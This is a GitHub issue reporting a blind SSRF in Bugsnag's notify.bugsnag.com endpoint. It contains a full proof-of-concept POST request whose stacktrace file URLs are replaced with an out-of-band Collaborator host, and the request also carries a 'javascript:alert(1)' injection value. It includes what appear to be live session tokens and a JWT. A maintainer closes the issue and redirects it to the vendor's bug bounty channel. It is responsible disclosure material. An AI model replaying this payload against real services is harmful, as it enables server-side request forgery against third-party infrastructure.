blind ssrf at notify.bugsnag.com js library

[yahyaayman55]

Description:
while iam testing on shopify program i found request that belong to Host: notify.bugsnag.com
at that request if you change all file parameters at request with burpcollaborator payload you will got an interacts from bugsnag server and got dns and http request at collaborator.

poc image:

vulnerable request With my ssrf payload as you see change all file parameter with burpcollaborator host

POST / HTTP/2
Host: notify.bugsnag.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Bugsnag-Api-Key: ***
Bugsnag-Payload-Version: 4
Bugsnag-Sent-At: 2024-04-21T05:48:28.383Z
Content-Length: 8166
Origin: https://arrive-server.shopifycloud.com/
Referer: https://arrive-server.shopifycloud.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers

{"apiKey":"***","notifier":{"name":"Bugsnag JavaScript","version":"7.22.7","url":"https://github.com/bugsnag/bugsnag-js"},"events":[{"payloadVersion":"4","exceptions":[{"errorClass":"SyntaxError","errorMessage":"Location.assign: 'https://javascript:alert(1)/apps/532861601aa89a5e70f5d56d075e82ac/merchant/?embedded=1&hmac=7508e4488151d3ecb2282ddad485d265804ec0b4bdf976ee8bdfb85148922c50&host=amF2YXNjcmlwdDphbGVydCgxKQ==&id_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tXC9hZG1pbiIsImRlc3QiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tIiwiYXVkIjoiNTMyODYxNjAxYWE4OWE1ZTcwZjVkNTZkMDc1ZTgyYWMiLCJzdWIiOiI4MzI5ODM4NjExNiIsImV4cCI6MTcxMzY3MDQ2OCwibmJmIjoxNzEzNjcwNDA4LCJpYXQiOjE3MTM2NzA0MDgsImp0aSI6ImY5MzQ0MGYxLTgzYTgtNGM1OS04M2Y2LWYyNjcxMDUwNDFkNiIsInNpZCI6IjFlMzA0MTI1LTg3ZmMtNDY1Ny04OGQxLTFiMzhkM2QxZjVmYSIsInNpZyI6IjNlMjgwMjU4MTVlOWFlMmFkNDRhMTZkOWE0OTdiZjU5NWYwYjQzM2Q5ZTcwYjVmZGJmYTNjNzU2MWEwNjEwZmUifQ.1N5oMbcXThL3Ij8JIyMS_xtzI--usht7FbmUQfaiHL8&locale=en&session=ad4dacf5d27f97cc182267a7b7759cf89e0abca0e68929434a199c3b318da0c5&shop=[quickstart-b651ea69.myshopify.com](http://quickstart-b651ea69.myshopify.com/)&timestamp=1713670408' is not a valid URL.","type":"browserjs","stacktrace":[{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/index-74d346a3.js","method":"jr.redirect","lineNumber":1,"columnNumber":147487},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/index-74d346a3.js","method":"e.createClientApp/</A<","lineNumber":1,"columnNumber":151989},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/index-74d346a3.js","method":"e.createClientApp/<","lineNumber":1,"columnNumber":152004},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/index-74d346a3.js","method":"O","lineNumber":1,"columnNumber":150890},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/merchant-67daf024.js","method":"t.default/l<","lineNumber":1,"columnNumber":42824},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"useMemo","lineNumber":20,"columnNumber":69065},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"r.useMemo","lineNumber":1,"columnNumber":6453},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/merchant-67daf024.js","method":"t.default","lineNumber":1,"columnNumber":42795},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"fu","lineNumber":20,"columnNumber":62757},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"fs","lineNumber":20,"columnNumber":119293},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"uc","lineNumber":20,"columnNumber":108532},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"ac","lineNumber":20,"columnNumber":108460},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"lc","lineNumber":20,"columnNumber":108321},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"qs","lineNumber":20,"columnNumber":105156},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"Qs","lineNumber":20,"columnNumber":103711},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"w","lineNumber":11,"columnNumber":1375},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"z","lineNumber":11,"columnNumber":1906}],"message":"Location.assign: 'https://javascript:alert(1)/apps/532861601aa89a5e70f5d56d075e82ac/merchant/?embedded=1&hmac=7508e4488151d3ecb2282ddad485d265804ec0b4bdf976ee8bdfb85148922c50&host=amF2YXNjcmlwdDphbGVydCgxKQ==&id_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tXC9hZG1pbiIsImRlc3QiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tIiwiYXVkIjoiNTMyODYxNjAxYWE4OWE1ZTcwZjVkNTZkMDc1ZTgyYWMiLCJzdWIiOiI4MzI5ODM4NjExNiIsImV4cCI6MTcxMzY3MDQ2OCwibmJmIjoxNzEzNjcwNDA4LCJpYXQiOjE3MTM2NzA0MDgsImp0aSI6ImY5MzQ0MGYxLTgzYTgtNGM1OS04M2Y2LWYyNjcxMDUwNDFkNiIsInNpZCI6IjFlMzA0MTI1LTg3ZmMtNDY1Ny04OGQxLTFiMzhkM2QxZjVmYSIsInNpZyI6IjNlMjgwMjU4MTVlOWFlMmFkNDRhMTZkOWE0OTdiZjU5NWYwYjQzM2Q5ZTcwYjVmZGJmYTNjNzU2MWEwNjEwZmUifQ.1N5oMbcXThL3Ij8JIyMS_xtzI--usht7FbmUQfaiHL8&locale=en&session=ad4dacf5d27f97cc182267a7b7759cf89e0abca0e68929434a199c3b318da0c5&shop=[quickstart-b651ea69.myshopify.com](http://quickstart-b651ea69.myshopify.com/)&timestamp=1713670408' is not a valid URL."}],"severity":"error","unhandled":true,"severityReason":{"type":"unhandledException"},"app":{"releaseStage":"production","version":"61d14dfdca0d1c1e6418323c0d16d8c669d3b03e","type":"shop-channel","duration":54},"device":{"locale":"en-US","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0","orientation":"landscape-primary","id":"clv93xro600002a628difgylk","time":"2024-04-21T05:48:28.382Z"},"request":{"url":"https://arrive-server.shopifycloud.com/merchant/?embedded=1&hmac=7508e4488151d3ecb2282ddad485d265804ec0b4bdf976ee8bdfb85148922c50&host=amF2YXNjcmlwdDphbGVydCgxKQ==&id_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tXC9hZG1pbiIsImRlc3QiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tIiwiYXVkIjoiNTMyODYxNjAxYWE4OWE1ZTcwZjVkNTZkMDc1ZTgyYWMiLCJzdWIiOiI4MzI5ODM4NjExNiIsImV4cCI6MTcxMzY3MDQ2OCwibmJmIjoxNzEzNjcwNDA4LCJpYXQiOjE3MTM2NzA0MDgsImp0aSI6ImY5MzQ0MGYxLTgzYTgtNGM1OS04M2Y2LWYyNjcxMDUwNDFkNiIsInNpZCI6IjFlMzA0MTI1LTg3ZmMtNDY1Ny04OGQxLTFiMzhkM2QxZjVmYSIsInNpZyI6IjNlMjgwMjU4MTVlOWFlMmFkNDRhMTZkOWE0OTdiZjU5NWYwYjQzM2Q5ZTcwYjVmZGJmYTNjNzU2MWEwNjEwZmUifQ.1N5oMbcXThL3Ij8JIyMS_xtzI--usht7FbmUQfaiHL8&locale=en&session=ad4dacf5d27f97cc182267a7b7759cf89e0abca0e68929434a199c3b318da0c5&shop=quickstart-b651ea69.myshopify.com&timestamp=1713670408"},"breadcrumbs":[{"type":"state","name":"Bugsnag loaded","timestamp":"2024-04-21T05:48:28.375Z","metaData":{}},{"type":"log","name":"Console output","timestamp":"2024-04-21T05:48:28.377Z","metaData":{"severity":"debug","[0]":"[bugsnag]","[1]":"Loaded!"}},{"type":"log","name":"Console output","timestamp":"2024-04-21T05:48:28.377Z","metaData":{"severity":"error","[0]":"SyntaxError: Location.assign: 'https://javascript:alert(1)/apps/532861601aa89a5e70f5d56d075e82ac/merchant/?embedded=1&hmac=7508e4488151d3ecb2282ddad485d265804ec0b4bdf976ee8bdfb85148922c50&host=amF2YXNjcmlwdDphbGVydCgxKQ==&id_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tXC9hZG1pbiIsImRlc3QiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tIiwiYXVkIjoiNTMyODYxNjAxYWE4OWE1ZTcwZjVkNTZkMDc1ZTgyYWMiLCJzdWIiOiI4MzI5ODM4NjExNiIsImV4cCI6MTcxMzY3MDQ2OCwibmJmIjoxNzEzNjcwNDA4LCJpYXQiOjE3MTM2NzA0MDgsImp0aSI6ImY5MzQ0MGYxLTgzYTgtNGM1OS04M2Y2LWYyNjcxMDUwNDFkNiIsInNpZCI6IjFlMzA0MTI1LTg3ZmMtNDY1Ny04OGQxLTFiMzhkM2QxZjVmYSIsInNpZyI6IjNlMjgwMjU4MTVlOWFlMmFkNDRhMTZkOWE0OTdiZjU5NWYwYjQzM2Q5ZTcwYjVmZGJmYTNjNzU2MWEwNjEwZmUifQ.1N5oMbcXThL3Ij8JIyMS_xtzI--usht7FbmUQfaiHL8&locale=en&session=ad4dacf5d27f97cc182267a7b7759cf89e0abca0e68929434a199c3b318da0c5&shop=[quickstart-b651ea69.myshopify.com](http://quickstart-b651ea69.myshopify.com/)&timestamp=1713670408' is not a valid URL."}}],"context":"/merchant/","metaData":{},"user":{"name":"quickstart-b651ea69.myshopify.com"},"featureFlags":[]}]}

[mclack]

Hi @yahyaayman55

Thanks for raising this. BugSnag is part of the SmartBear bug bounty program, and we are aware that you have submitted a report to HackerOne via the SmartBear 'Contact Security' page: https://smartbear.com/security/contact-security/

As this has been raised through the appropriate avenue, we are going to close this GitHub issue. Please feel free to contact us directly at support@bugsnag.com if you have any further questions regarding this.